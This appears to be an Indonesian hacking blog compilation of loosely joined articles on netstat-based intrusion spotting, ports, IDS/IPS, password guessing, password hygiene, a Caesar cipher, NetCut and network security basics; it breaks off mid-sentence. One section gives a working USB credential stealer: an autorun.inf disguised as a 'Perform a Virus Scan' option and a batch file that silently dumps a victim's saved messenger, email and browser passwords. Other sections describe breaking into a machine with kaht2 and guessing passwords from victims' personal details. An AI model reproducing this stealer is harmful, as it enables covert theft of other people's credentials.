== MENDITEKSI PENYUSUP JARINGAN LEWAT DOS ==


yang sedang memantau kita baik itu adminya atau memang orang iseng yang mau
mencuri informasi dari kita , maka dengan itu saya akan sedikit mencoba melihat
atau mendetiksinya hanya denga dos command !


Ternyata di Dos ada fasiltas yang mungkin kita semua lupakan dan jarang digunakan
perintah itu adalah NETSTAT . Windows menyediakan perintah ini untuk mendukung
jaringan . Netstat juga bisa digunakan untuk melihat ip-ip yang sedang terhubung
ke komputer kita .
Untuk itu buka dos command kamu , tau kan caranya :d kalau ga tau nich :
- Start>Run>command.exe [utk win 95/98]
- Start>Run>cmd.exe [utk win 2000/xp /nt]
lalu mucul deh command prompt

C:\winnt>netstat ?
Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
interval dedisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.

Sekarang kita gunakan netstat untuk melihat koneksi yang sedang terhubung gunakan -a

C:\winnt>netstat -a
Proto Local Address Foreign Address State
TCP me:http me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:epmap me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:https me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:microsoft-ds me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1025 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1027 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1028 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1071 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1146 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1163 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1253 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1261 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1288 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1306 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1314 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:5101 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:epmap 10.22.1.236:4504 TIME_WAIT -> komputer luar
TCP me:netbios-ssn me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1071 LAJKTTS02:1080 ESTABLISHED
TCP me:1288 IS~HRS:microsoft-ds ESTABLISHED
TCP me:1306 GREENGUY:microsoft-ds ESTABLISHED
UDP me:1134 *.*

sebelah nama pc itu adalah port yang digunakan untuk hubungan .
netstat diatas saya mengunakan komputer kantor yang mengunakan ip dhcp .
Disini kita bisa melihat siapa-siapa aja yang terhubung dalam komputer kita
atau dengan contoh yang lebih jelas ini . Untuk lebih jelasnya aku akan coba
menyusup ke komputer orang lain dengan mengunakan kaht2 :d
dan aku udah dapat menyusup.

C:\WINDOWS\System32>netstat -a
Active Connections

Proto Local Address Foreign Address State
TCP khs_2003:epmap khs_2003:0 LISTENING
TCP khs_2003:microsoft-ds khs_2003:0 LISTENING
TCP khs_2003:1025 khs_2003:0 LISTENING
TCP khs_2003:1063 khs_2003:0 LISTENING
TCP khs_2003:1093 khs_2003:0 LISTENING
TCP khs_2003:1136 khs_2003:0 LISTENING
TCP khs_2003:1138 khs_2003:0 LISTENING
TCP khs_2003:5000 khs_2003:0 LISTENING
TCP khs_2003:43715 khs_2003:0 LISTENING
TCP khs_2003:epmap 10.21.3.17:3628 TIME_WAIT <------1
TCP khs_2003:epmap 10.21.3.50:1686 FIN_WAIT_2 <------2
--> luar juga
TCP khs_2003:netbios-ssn khs_2003:0 LISTENING
TCP khs_2003:1093 10.21.1.18:8080 CLOSE_WAIT
TCP khs_2003:1136 10.21.1.18:8080 ESTABLISHED
TCP khs_2003:1138 10.21.1.18:8080 ESTABLISHED
TCP khs_2003:11196 khs_2003:0 LISTENING
TCP khs_2003:43715 10.21.3.50:1687 ESTABLISHED <------3 --> gw susup
UDP khs_2003:microsoft-ds *:*
UDP khs_2003:isakmp *:*
UDP khs_2003:1028 *:*
UDP khs_2003:1035 *:*
UDP khs_2003:ntp *:*
UDP khs_2003:netbios-ns *:*
UDP khs_2003:netbios-dgm *:*
UDP khs_2003:1900 *:*
UDP khs_2003:13715 *:*
UDP khs_2003:61804 *:*
UDP khs_2003:ntp *:*
UDP khs_2003:1032 *:*
UDP khs_2003:1036 *:*
UDP khs_2003:1107 *:*
UDP khs_2003:1134 *:*
UDP khs_2003:1900 *:*
Komputer ini sedang di susupi oleh aku coba lihat port nya.pada angka 3 ada
port yang dibuka kaht2 untuk menge sploit suatu komputer .
lalu bagaimana kita cara kita untuk mengetahui nama komputer yang sedang
menyusup ke komputer kita . Gunakan nbtstat -a
C:\WINDOWS\System32>nbtstat -a [ip]
C:\WINDOWS\Syetem32>nbtstat -a 10.21.3.50
Jantung:
Node IpAddress: [10.21.3.50] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
ME <00> UNIQUE Registered
ME <20> UNIQUE Registered
WORKGROUP <00> GROUP Registered
WORKGROUP <1E> GROUP Registered
ME <03> UNIQUE Registered
INet~Services <1C> GROUP Registered
IS~ME..........<00> UNIQUE Registered

MAC Address = 00-60-08-29-37-48

Coba lihat ternyata ip 10.21.3.50 nama pc nya adalah me dan dia join ke workgroup.
Kita bisa buat kaget orang yang mengintip kita itu gunakan netsend fasiltas yang
hanya ada pada win 2000/xp atau nt .

C:\winnt>net send [ip/nama pc] [pesan]

Sebetulnya masih ada lagi fasilitas2 dos yang bisa digunakan untuk iseng :D
jadi tambah ngerti dan asyik bukan main-main di DOS command ,apalagi kalau
main di warnet :d , ya udah segitu aja tricknya semoga bermaanfaat .

Penjelasan IDS/ IPS


ok berikut penjelasan IDS/ IPS

1. IDS ( Intrution Detection System )

Intrution Detection System atau biasa disebut IDS adalah sebuah sistem yang berfungsi untuk mencatat/ memonitoring paket yang lewat dan jika terdapat
paket yang terdeteksi sebagai serangan, software akan mengalertnya ke pada admin bahwa terdapat paket serangan,

Keuntungan IDS :

- paket yang lewat semua dicatat
- Terdapat alert jika terdapat serangan

Kelemahan IDS :

- semua paket boleh lewat dan masuk ke dalam komputer

2. IPS ( Intrution Prevention System )

Intrution Prevention System atau biasa disebut IPS adalah sebuah sistem yang berfungsi untuk menahan paket yang lewat jika terdapat serangan,
mirip firewall lagi sih, tapi yang ini jik terdapat paket asing yang tercatat sebagai serangan akan di block,

Keuntungan menggunakan IPS :

- paket yang lewat akan diperiksa satu-satu
- paket diblock dan tidak dijinkan lewat jika paket tersebut terdeteksi sebagai serangan

Kelemahan IPS :

- paket yang lewat dibongkar dan dicek secara merinci jadi beberapa paket saja butuh proses waktu yang lama untuk pemeriksaan

Pengenalan Port


belum tahu port adalah sebuah lubang yang memungkinkan suatu (data)
untuk memasukinya. Komputer bisa dikatakan memiliki 2 macam port,
yaitu port fisik dan port perangkat lunak. Port fisik adalah slot yg
ada pada bagian belakang CPU, sedangkan port perangkat lunak adalah port
yg dipakai oleh software saat melakukan koneksi dengan komputer lain.
Nah yg berhubungan secara langsung dengan kegiatan kita saat bermain dgn
internet adalah
port perangkat lunak. Port perangkat lunak ini dapat kita bedakan
menjadi 3, yaitu:

a)well known port
port jenis ini memiliki range dari 0-1023,semula sih hanya memiliki
range dari 0-255 tapi oleh IANA(Internet Assigned Number Authority)
dilebarkan menjadi range tadi yg disebutkan diawal. Pada kebanyakan
sistem port pada range ini hanya dapat dipakai oleh root,atau oleh
program yang dijalankan oleh user. Karena range-nya dari 0-1023 maka
port2 terkenal seperti ftp(21),ssh(22),telnet(23),http(80) termasuk
dalam jenis ini.

b)Registered Ports
memiliki range dari 1024-49151, port jenis ini tidak ditujukan untuk
service tertentu dari suatu server. Lalu apa gunanya dong?? hehehe,
port pada range ini biasanya digunakan oleh Networking utlites seperti
Browser, Email Client, FTP software untuk berkomunikasi dengan remote
server. Biasanya Networking utlites akan membuka secara acak port pada
range ini untuk terhubung dgn remote server. Port number pada range
inilah yang membuat kita dapat melakukan surfing di internet,melakukan
pengecekan e-mail,dll. Jadi sangat berguna kan? hehehe Port ini akan
membuka sementara ketika kita sedang menjalankan sebuah aplikasi
sehingga apabila kita menutup aplikasi tersebut maka secara otomatis
port ini pun akan tertutup dgn sendirinya(ingat Networking utlites
membukanya secara acak)

c)The Dynamic/Private Ports
memiliki range dari 49152-65535, biasanya sih digunakan oleh sebagian
besar trojan(waaaaaaaa..), tapi ada juga sih program yang memkai port
ini terutama program yang memerlukan range port number yang besar,
seperti pada Sun yang menjalankan RPC pada port 32768.

Untuk lebih jelasnya mari kita lihat :

C:\windows>netstat -a
Active Connections
Proto Local Address Foreign Address State
TCP juve:1031 juve.box.sk:ftp ESTABLISHED
TCP juve:1036 juve.box.sk:ftp-data TIME_WAIT
TCP juve:1043 banners.egroups.com:80 FIN_WAIT_2
TCP juve:1045 mail.kalteng.net.inop3 TIME_WAIT
TCP juve:1052 banners.boxnetwork.net:80 ESTABLISHED
TCP juve:1053 mail.kalteng.net.inop3 TIME_WAIT
UDP juve:1025 *:*
UDP juve:nbdatagram *:*

Mari kita ambil satu baris dari contoh diatas :

Proto Local Address Foreign Address State
TCP juve:1031 juve.box.sk:ftp ESTABLISHED

data diatas menunjukan pada kita bahwa:
*Protocol: TCP (ini adalah Transmission Control Protocol atau TCP, User
Datagram
Protocol atau UDP, IP atau Internet Protocol)
*Nama lokal sistem: juve (ini adalah nama dari lokal sistem yang kita
setting pada windows setup)
*Lokal port yang terbuka dan digunakan pada saat melakukan koneksi ini
adalah: 1031
*Remote Sistem: juve.box.sk (ini adalah non-numerical form dari sistem
dimana kita terkoneksi)
*Remote Port: ftp (ini adalah port number dari remote sistem
kalteng.box.sk dimana kita terkoneksi)
*Keterangan koneksi: ESTABLISHED

Hack Kayak Yang di tivi-tivi


oh ya cuma work di Wind*** di Os laen lom coba


Spoiler untuk TUTORIAL:

pertama-tama kita membutuhkan tools berikut ini:

Code:
MessenPass: buat lihat password messenger yang paling populer contohnya: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger yang disediakan dengan Netscape 7, Trillian, Miranda, dan Gaim.

PassView mail: melihat passowrd dari program email berikut: Outlook Express, Microsoft Outlook 2000 (POP3 dan SMTP Account saja), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP dan SMTP Account), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Gratis.
PassView mail juga dapat memulihkan password Web berbasis account email (Hotmail, Yahoo!, Gmail), jika Anda menggunakan program yang terkait account tersebut.

Passview IE: IE PassView adalah utilitas kecil yang mengungkapkan password yang disimpan oleh browser Internet Explorer. Baru mendukung Internet Explorer 7.0, serta versi Internet explorer, v4.0 - v6.0

Protected Storage PassView: Sembuh semua password yang tersimpan di dalam Protected Storage, termasuk AutoComplete password Internet Explorer, password dari situs yang dilindungi sandi, MSN Explorer Sandi, dan banyak lagi ...

PasswordFox: PasswordFox adalah pemulihan password kecil alat yang memungkinkan Anda untuk melihat nama pengguna dan sandi yang disimpan oleh browser Web Mozilla Firefox. Secara default, PasswordFox menampilkan password disimpan dalam profil Anda saat ini, tetapi Anda dapat dengan mudah memilih untuk menonton password Firefox lain profil. Untuk setiap entri kata sandi, informasi berikut ini ditampilkan: Rekam Index, Web Site, User Name, Password, User Name Field, Password Field, dan Signons nama file.


Nah Tools Tersebut...dapat anda download disini


sebenernya banyak banget tools lainnya (dialuppass,cromepass) .tapi sesuaikan dengan keperluan aja, anda mau hack apa? firefoxnya, ym, msn, dll. pilihlah tools yang ada disana.

note: beberapa antivirus menggap itu sebagai virus..wajar si karena itu file yang mengrecovery password anda secara illegal. tapi dijamin itu nga menganggu system kamu.



Langkahnya2 :
1. download 5 Tools tersebut lalu taruh di flash diskmu tapi hanya yang .exe aja
contoh : mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe

2.buka notepad lalu ketikan code berikut
Code:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
lalu save dengan autorun.inf taruh di Folder Root FD mu

3.step ke 3...buka lagi notepad baru ketikan code berikut
Code:
start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt
lalu save dengan nama "launch.bat" save di FD mu juga

OK selesai !!!!

cara pake nya gmn?

1. Masukin FD mu...ntar Bakal muncul PopUp/AutoPlay( ini karena kita uda buat autorun.inf)
2. Di Windows Autoplay pilih "Perform a Virus Scan"
3.Nah..Pas u pilih option tadi, semua Id uda kehack ama tools tadi secara diem-diem. coba Sekarang buka FD kamu Semua Password Uda Kesimpan di File .Txt

Mencegah Netcut

http://ip.tools4free.net/download.htm

ga susah koq pakenya, tinggal dijalanin dan d didiemin aja



ini kalo nanti ketemu dalam jaringan yg lagi ngeCut



see its not hard

Seni Menebak Password

social engineering) danseni berfikir logika.

Pada artikel ini akan kita bahas teknik "BLIND GUESSING". Teknik ini merupakan dasar dari "Dictionary Attack", dimana kita mencoba untuk menebak kemungkinan terbesar dari password. Setelah kita berhasil menyusun kemungkinan tebakan password, kita bisa menggunakan Brute
Force Tool, seperti "BRUTUS".

_Pendahuluan

Sebelumnya, anggap teknik yang dijabarkan disini sebagai "seni berfikir", - saya jamin - anda akan frustasi dalam penebakan password. Bagi User yang cerdik, mereka akan menggunakan password yang sangat sulit ditebak. Bahkan mereka menggunakan kombinasi yang sangat panjang, termasuk didalamnya karakter alpha-numerik dan karakter spesial.

Sebagai pertimbangan, gunakan perbandingan dibawah untuk mendapatkan jumlah kemungkinan kombinasi!


Spoiler untuk :


Notasi:
X = Jumlah karakter kombinasi
Y = Jumlah karakter password
Z = Jumlah kombinasi karakter password
^ = Pangkat - dalam matematika -

~~~~~~~~~~~~~
Z = X^Y
~~~~~~~~~~~~~

Contoh:
- Karakter kombinasi adalah *hanya* angka.
Karakter-nya yaitu: {1,2,3,4,5,6,7,8,9,0}
Jumlah = 10
- Jumlah karakter password = 2
Misalnya password yang digunakan hanya 2 karakter (ex: 37)

Maka jumlah kombinasi password yang mungkin terjadi adalah:
10^2 = 100;



Tentu saja bisa anda bayangkan jika karakter kombinasi password adalah karakter alpha-numerik dan karakter spesial, ditambah lagi dengan jumlah karakter password yang banyak. Hal diatas akan menghasilkan banyak sekali kombinasi. Namun itu-lah tantangan :))

_Blind Guessing

Sebelum melakukan ini, pastikan anda telah mendapatkan informasi tentang korban. Misalnya nama, nama orang tua, tanggal lahir, nama kekasih dan lain-lain. Dapatkan sebanyak mungkin! Hal ini akan sangat
membantu!

Spoiler untuk :


[1] Kombinasi umum
Beberapa user yang malas suka menggunakan kombinasi yang mudah
diingat dan simpel. Contoh:

1234567890
0987654321
zxcvbnm
mnbvcxz
asdfghjkl
lkjhgfdsa
qwertyuiop
poiuytrewq

Jika melihat kombinasi diatas, saya rasa tidak sulit untuk
menemukan cara mengetik-nya :))

[2] Kombinasi `Ala Hacker'
Hacker suka sekali menggunakan angka sebagai pengganti huruf,
contoh:

h4ck3r, 70m1, m0b1 ...

Kemungkinan kombinasi tergantung menurut nama dan beberapa
kriteria lain seperti nama kekasih, hobi, nama situs/layanan yang
digunakan dll.

Contoh:
Nama korban = Master Hacker
Kemungkinan: m45t3r_h4ck3r, m4s73r, h4ck3r ...

[3] Berhubungan dengan nama
Nama: John Doe
Kemungkinan: doe, jdoe, johndoe, jd, dll ...

[4] Berhubungan dengan handle
Nama: John Doe
Handle: tikus
Kemungkinan: jdtikus, tikusdoe, tikusjohn, tikus, rat, doetikus,
dll ..

[5] Berhubungan dengan nama kekasih/sahabat
Nama: John Doe
Kekasih: Fitria
Kemungkinan: johnlovefitria, fitriailoveyou, jdf, johnfitria, dll
...

[6] Berhubungan dengan nomor telefon
Nama: John Doe
No Telfon: 12345
Kemungkinan: jd12345, 12345, 54321, dll ...

[7] Berhubungan dengan layanan/servis yang digunakan
Nama: John Doe
Servis: email
Kemungkinan: johnemail, jdemail, doemail, mymail, myemail, dll ...



_Berbagai kemungkinan

Bisa kita lihat dari kombinasi diatas - yang sebenarnya masih sangat banyak - ada banyak sekali kemungkinan yang terjadi. Namun beberapa yang cukup akurat adalah kombinasi umum dan kombinasi ala hacker.

Sengaja saya sebut kombinasi umum karena dalam banyak review dengan rekan-rekan dan beberapa kenalan, kombinasi {z,x,c,v,b,n,m} sangat dikenal. Tidaklah begitu sulit untuk menghafal-nya, dan pada dasarnya tidak perlu dihafal karena memiliki susunan yang unik. Sebagian besar user cenderung menggunakan hal-hal sederhana.

Kombinasi `Ala Hacker' juga sangat sering saya jumpai. Dengan teknik social dan akses fisik, saya sering menemukan penggunaan password dengan kombinasi seperti ini. Penggunaan kombinasi ini sangat sederhana dan mudah diingat. Kombinasi ini SANGAT berhubungan dengan nama atau handle.

_Quo Vadis

Kembali kepada anda, sejauh mana kreatifitas anda, sebanyak apa informasi yang berhasil anda dapatkan, akan sangat membantu akurasi penebakan password.

Sebagai seorang pengguna layanan dengan autentikasi yang membutuhkan password, kita tentu tidak pernah lepas dari masalah pemilihan password yang baik. Password yang baik hendaknya sulit untuk ditebak, tidak berhubugan dengan diri kita atau orang terdekat.

Contohnya .... cukup simpan dalam pikiran anda !

EOF.

== Tips Pemakaian Password ==



Mungkin terkesan mudah, dan aku mohon maaf jika artikel ini
kesannya terlalu 'low content', tetapi tidak !! password
merupakan hal vital dalam proses Authentication, so bagi
yang udah tau tolong koreksinya, kalo yang belum, boleh di
pahami.


Agar Password yang digunakan efektif maka :

1. Minimal mempunyai panjang 6 karakter, lebih baik lagi jika
panjangnya minimal 8 karakter dan terdapat sedikitnya 1 buah
karakter angka atau karakter yang special .

2. Tidak memiliki maksud/makna, password yang memiliki makna
atau maksud akan relatif lebih mudah untuk di tebak misalnya:
nama pacar, nama anggota keluarga, alamat,tanggal lahir dsb.

3. Sebaiknya di beri periode berlaku, artinya sering seringlah
mengganti password yang di gunakan

4. Jangan gunakan kembali nama login (username) untuk sebagai
password dalam bentuk apapun, baik diganti huruf kapital,
dibalik, diulang dsb.

5. Jangan gunakan kata-kata yang umum dan terdapat dalam kamus.

6. Jangan pernah mencatat password yang anda pakai ditempat2
yang dapat diakses umum, atau berakibat fatal apabila hilang

7. jangan gunakan password yang sulit dalam artian membuat anda
kesulitan menghapalnya tetapi tetap tidak menggurangi kekuatannya.
ingat! mudah dihapal tidak selalu mudah ditebak :P

8. jangan pernah memberitahukan password anda kepada orang lain
baik dengan berbagai alasan tertentu

9. apabila anda rasa perlu silakan gunakan software atau utilitas
tambahan untuk menambah keamanan password anda

10.tidak ada salahnya mencoba mencrack password anda sendiri
agar anda yakin!

11.usahakan untuk tidak menggunakan password yang sama pada
account yang berbeda.

12. sedapat mungkin untuk menggunakan kombinasi karakter.

13. ......

contoh password : C0nT*hP4SSwoRD+


NB Penulis : gw password paling pendek 9 karakter, yang paling sering dipake 25 karakter semuanya kombinasi huruf+angka

Tipe - Tipe Hacker



1. Black Hat Hacker



Hacker ini biasa disebut cracking, hacker yg selalu menggunakan ilmu hacking untuk kesenangan sendiri, biasanya hacker ini mempunyai komunitas-komunitas untuk melakukan kejahatannya.

NB : gw abis baca modul CEH v8 ternyata Hacker Al-Qaeda dimasukkan juga .. pada bab hacker terroris.. .. maksudnya gw masi bingung teroris apa termasuk dalam Black Hat hacker ???

2. White Hat Hacker



ini kebalikan dari black hat.. biasa disebut satpam eh security internet... biasanya menggunakan ilmu hacking sebaik-baiknya dan digunakan sebagai pertahanan, biasanya orang yg mencari hole/ lubang keamanan dan melaporkan pada adminnya..

NB : forensic termasuk white hat bukan ya

3. Gray Hat Hacker



Disebut gray karena memang menggunakan ilmu hacking untuk kebaikan dan kejahatan .. tau sendiri lah.. hacker banyaknya mengambil tipe hacker ini... tapi profesi gw sendiri White Hat koq

4. Leecher/ Nubie

tau sendiri kan.. menggunakan teknik hacking yg dibuat oleh hacker lain yg digunakan dengan sembarangan.. leecher tipe hacker yg sebatas hanya butuh untuk menggunakan teknik hacking, sedangkan nubie tipe hacker yang ingin maju sampai elite...

next topic : "Pangkat-pangkat hacker"

sekian aku nubie hacker...

NB : aku ga akan post teknik hacking selain security aku benci black hat

Caesar Shift Cipher



Caesar Shift adalah salah satu teknik enkripsi yang paling sederhana. Dinamakan
Caesar karena digunakan oleh Julius Caesar, seorang pemimpin militer dan
politikus Romawi. Caesar cipher banyak digunakan sebagai bagian dari enkripsi
yang lebih rumit.

Di artikel ini, akan dijelaskan pembuatan cipher Caesar Shift sederhana dengan
menggunakan bahasa pemrograman C++.

====== Tujuan ---|

Tujuan artikel ini adalah untuk memberikan gambaran bagaimana cryptography
sederhana bekerja. Maka dari itu, Caesar Shift yang dipilih untuk pembuatan
cipher ini.

====== Cara Kerja Caesar Shift ---|

Misalnya, kata 'kimochi' bila dienkripsikan menggunakan Caesar Shift
menggunakan pergeseran huruf sebanyak 13 huruf :

A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
N O P Q R S T U V W X Y Z A B C D E F G H I J K L M

K = X
I = V
M = Z
O = B
C = P
H = U
I = V

KIMOCHI akan menjadi XVZBPUV

Sedangkan jika menggunakan pergeseran sebanyak 17 huruf maka :

A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
R S T U V W X Y Z A B C D E F G H I J K L M N O P Q

K = B
I = Z
M = D
O = F
C = T
H = Y
I = Z

KIMOCHI menjadi BZDFTYZ

so its not hard right

Memperbaiki komputer koban Cut dari NetCut





Sebenarnya kerjanya Netcut sama miripnya dengan Man-In-The-Middle Attack atau kata lain ARP-Poisoning
yang dimana data paket ARP komputer korban harus melewati komputer attacker..

nah dengan Netcut.. komputer yg di 'CUT' ARPnya tidak boleh lewat dari komputer attacker, maka dari itu komputer korban tidak dapat terkoneksi dengan internet lagi.

untuk memperbaiki komputer korban cukup dengan mengganti MAC Address dari komputer korban, caranya gampang, donlot aplikasi ini dulu

macmakeup.zip

nah isi filenya terdiri dari



lalu jalankan File MacMakeUp.exe

tampilannya akan seperti berikut :



1. pilih adapternya ( dalam arti lain, piilih card network kamu )
2. Klik manufacture lalu pilih asal disini, bebas pilih apa aja

NB : jgn menggunakan tombol Random, saya udah mencoba ini, hasilnya tetap masih d blocking,

3. Lalu pilih Change
4. Tunggu sebentar karena network interface sedang di restart. setelah network interface kamu up lagi..
coba koneksikan dengan internet.. bisa jalan lagi iss:

NB : Jika ada masalah pada saat setelah d change MAC address nya... dengan catatan sebelum programnya d close, klik tombol Remove, dan tunggu sampai bring up lagi..

Network Security 101: Teori dan Prinsip

-- -- -( Foreword )


Tujuan dari penulisan artikel ini adalah untuk menyediakan landasan
umum yang bagus akan pemahaman keamanan jaringan komputer. Pemahaman dasar
pada keamanan jaringan komputer sangat perlu untuk merawat jaringan komputer
tanpa harus terjadi insiden keamanan didalam jaringan itu. Artikel ini juga
sebagai bahan ilustrasi beberapa insiden keamanan yang terjadi dan mencoba
menjelaskan bagaimana cara melindungi dengan mengambil keuntungan dari celah
keamanan itu sendiri.

Artikel ini tidak akan menjelaskan secara detil akan tetapi para
pembaca setidaknya telah mendapat suatu gambaran yang bagus dan mungkin
mendapat ide untuk dimana mencari jawaban apabila ingin mencari beberapa
informasi tambahan.


-- -- -( Keamanan Jaringan Komputer )

Keamanan jaringan komputer sendiri sering dipandang sebagai hasil dari
beberapa faktor. Faktor ini bervariasi tergantung pada bahan dasar, tetapi
secara normal setidaknya beberapa hal dibawah ini diikutsertakan :

* Confidentiality (kerahasiaan).
* Integrity (integritas).
* Availability (ketersediaan).

Keamanan klasik penting ini tidak cukup untuk mencakup semua aspek
dari keamanan jaringan komputer pada masa sekarang [1]. Hal-hal tersebut
dapat dikombinasikan lagi oleh beberapa hal penting lainnya yang dapat membuat
keamanan jaringan komputer dapat ditingkatkan lagi dengan mengikut sertakan
hal dibawah ini:

* Nonrepudiation.
* Authenticity.
* Possession.
* Utility.


+ Availability (ketersediaan).

Ketersediaan data atau layanan dapat dengan mudah dipantau oleh
pengguna dari sebuah layanan. Yang dimana ketidaktersediaan dari sebuah
layanan (service) dapat menjadi sebuah halangan untuk maju bagi sebuah
perusahaan dan bahkan dapat berdampak lebih buruk lagi, yaitu penghentian
proses produksi [1]. Sehingga untuk semua aktifitas jaringan, ketersediaan
data sangat penting untuk sebuah system agar dapat terus berjalan dengan benar.


+ Confidentiality (kerahasiaan).

Ada beberapa jenis informasi yang tersedia didalam sebuah jaringan
komputer. Setiap data yang berbeda pasti mempunyai grup pengguna yang berbeda
pula dan data dapat dikelompokkan sehingga beberapa pembatasan kepada
pengunaan data harus ditentukan. Pada umumnya data yang terdapat didalam
suatu perusahaan bersifat rahasia dan tidak boleh diketahui oleh pihak ketiga
yang bertujuan untuk menjaga rahasia perusahaan dan strategi perusahaan [2].
Backdoor, sebagai contoh, melanggar kebijakan perusahaan dikarenakan
menyediakan akses yang tidak diinginkan kedalam jaringan komputer perusahaan.

Kerahasiaan dapat ditingkatkan dan didalam beberapa kasus
pengengkripsian data atau menggunakan VPN [22][2]. Topik ini tidak akan,
tetapi bagaimanapun juga, akan disertakan dalam tulisan ini. Kontrol akses
adalah cara yang lazim digunakan untuk membatasi akses kedalam sebuah
jaringan komputer. Sebuah cara yang mudah tetapi mampu untuk membatasi
akses adalah dengan menggunakan kombinasi dari username-dan-password untuk
proses otentifikasi pengguna dan memberikan akses kepada pengguna (user)
yang telah dikenali [2]. Didalam beberapa lingkungan kerja keamanan jaringan
komputer, ini dibahas dan dipisahkan dalam konteks otentifikasi [3].


+ Integrity (integritas).

Jaringan komputer yang dapat diandalkan juga berdasar pada fakta
bahwa data yang tersedia apa yang sudah seharusnya. Jaringan komputer mau
tidak mau harus terlindungi dari serangan (attacks) yang dapat merubah data
selama dalam proses persinggahan (transmit) [4]. Man-in-the-Middle merupakan
jenis serangan yang dapat merubah integritas dari sebuah data yang mana
penyerang (attacker) dapat membajak "session" atau memanipulasi data yang
terkirim [5].

Didalam jaringan komputer yang aman, partisipan dari sebuah "transaksi"
data harus yakin bahwa orang yang terlibat dalam komunikasi data dapat
diandalkan dan dapat dipercaya. Keamanan dari sebuah komunikasi data sangat
diperlukan pada sebuah tingkatan yang dipastikan data tidak berubah selama
proses pengiriman dan penerimaan pada saat komunikasi data. Ini tidak harus
selalu berarti bahwa "traffic" perlu di enkripsi, tapi juga tidak tertutup
kemungkinan serangan "Man-in-the-Middle" dapat terjadi.


+ Nonrepudiation.

Setiap tindakan yang dilakukan dalam sebuah system yang aman telah
diawasi (logged), ini dapat berarti penggunaan alat (tool) untuk melakukan
pengecekan system berfungsi sebagaimana seharusnya. "Log" juga tidak dapat
dipisahkan dari bagian keamanan "system" yang dimana bila terjadi sebuah
penyusupan atau serangan lain akan sangat membantu proses investigasi [17].
"Log" dan catatan waktu, sebagai contoh, bagian penting dari bukti di
pengadilan jika cracker tertangkap dan diadili. Untuk alasan ini maka
"nonrepudiation" dianggap sebagai sebuah faktor penting didalam keamanan
jaringan komputer yang berkompeten.

ITU-T telah mendefinisikan "nonrepudition" sebagai berikut :
1. Kemampuan untuk mencegah seorang pengirim untuk menyangkal kemudian
bahwa dia telah mengirim pesan atau melakukan sebuah tindakan.

2. Proteksi dari penyangkalan oleh satu satu dari entitas yang terlibat
didalam sebuah komunikasi yang turut serta secara keseluruhan atau
sebagian dari komunikasi yang terjadi [7].


Jaringan komputer dan system data yang lain dibangun dari beberapa
komponen yang berbeda yang dimana masing-masing mempunyai karakteristik
spesial untuk keamanan. Sebuah jaringan komputer yang aman perlu masalah
keamanan yang harus diperhatikan disemua sektor, yang mana rantai keamanan
yang komplit sangat lemah, selemah titik terlemahnya [8]. Pengguna (user)
merupakan bagian penting dari sebuah rantai. "Social engineering" merupakan
cara yang efisien untuk mencari celah (vulnerabilities) pada suatu system [21]
dan kebanyakan orang menggunakan "password" yang mudah ditebak. Ini juga
berarti meninggalkan "workstation" tidak dalam keadaan terkunci pada saat
makan siang atau yang lainnya.

Sistem operasi (operating system : Windows, Unix, Linux, MacOS)
terdapat dimana-mana, komputer mempunyai sistem operasi yang berbeda-beda
antara satu dengan yang lainnya (tergantung selera), dan bahkan router juga
dijalankan oleh oleh sistem operasi. Setiap sistem operasi mempunyai gaya dan
karakteristik sendiri yang membedakannya dengan sistem operasi yang lainnya,
dan beberapa bahkan digunakan untuk kepentingan "server". Beberapa sistem
operasi juga mempunyai masalah yang dapat digunakan sehingga menyebabkan
sistem operasi tersebut berhenti merespon pengguna.

Layanan pada "server" memainkan peranan penting dalam keamanan.
Developer perangkat lunak mengumumkan celah keamanan pada perangkat lunak
dengan cepat. Alasan yang digunakan adalah celah ini kemungkinan akan digunakan
oleh pihak yang tidak bertanggung jawab untuk menyusupi sebuah system ataupun
setiap pengguna komputer. Pengelola atau pengguna server dan workstation harus
melakukan pengecekan untuk "update" masalah keamanan secara regular.

Perangkat keras mungkin sedikit susah dipahami sebagai sesuatu yang
mempunyai potensi untuk mempunyai masalah keamanan. Yang sesungguhnya adalah
sangat berbeda dengan apa yang kita pikirkan, apabila perangkat keras terletak
di sebuah lokasi yang tidak aman maka terdapat resiko untuk pemasangan perangkat
keras yang tidak diinginkan kedalam jaringan komputer dan ini dapat membuat
penyusupan menjadi mudah. Juga, bila sebuah perangkat keras jaringan komputer
